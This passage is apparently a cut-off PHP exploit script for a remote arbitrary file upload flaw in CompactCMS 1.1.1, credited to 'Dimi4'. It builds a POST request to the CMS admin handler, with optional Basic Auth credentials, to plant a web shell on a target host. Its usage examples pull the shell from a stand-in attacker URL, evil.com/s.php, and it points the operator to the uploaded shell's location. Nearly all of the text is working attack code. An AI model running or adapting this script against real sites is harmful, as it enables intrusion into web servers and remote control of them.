.\n\n"; echo "[?][?] Ex: ".$argv[0]." www.host.com /ct/ http://evil.com/s.php\n\n"; echo "[?] Usage: ".$argv[0]." .\n\n"; echo "[?][?] Ex (Basic AUTH): ".$argv[0]." www.host.com /ct/ http://evil.com/s.php admin 12345\n\n"; die(); } if ($argv[1] == "") { help(); die(); } $host = $argv[1]; $path = $argv[2]; $shell = $argv[3]; $login = $argv[4]; $pass = $argv[5]; $tmpshell = "1123"; $shellname = "manpage.php"; $payload .= "action=Save changes&content=\r\n\r\n"; echo(" ------------------------------------------------------------------ \tCompactCMS v 1.1.1 Remote Arbitrary File Upload Exploit ------------------------------------------------------------------\n\n"); echo("**\t Coded by Dimi4, greetz Antichat\n\n"); echo ("[+] Connecting to {$host}...\n"); $packet = "POST http://{$host}/{$path}/admin/handler.inc.php?file={$tmpshell} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "prama: no-cache\r\n"; if(!empty($login) && !empty($pass)) { $packet .= "Authorization: Basic ".base64_encode($login.':'.$pass)."\r\n"; } $packet .= "Accept: text/html\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length: ".strlen($payload)."\n\n"; $packet .= $payload; $response = http_send($host, $packet); //echo ($response); if (preg_match("/WWW-Authenticate/i", $response)) { die("[-] Authorization Required. Set Login And Password or CORRECT them please!\n"); } else { echo ("[+] Sending Payload...\n"); echo ("[+] Downloading shell...\n"); if(!file_get_contents($shell)) { echo ("\t[!] Warning! Can't Download shell!\n"); $warning = "Maybe"; } echo ("\t[+]$warning Successful! Check: http://{$host}{$path}content/$tmpshell.php\n"); die(); } ?>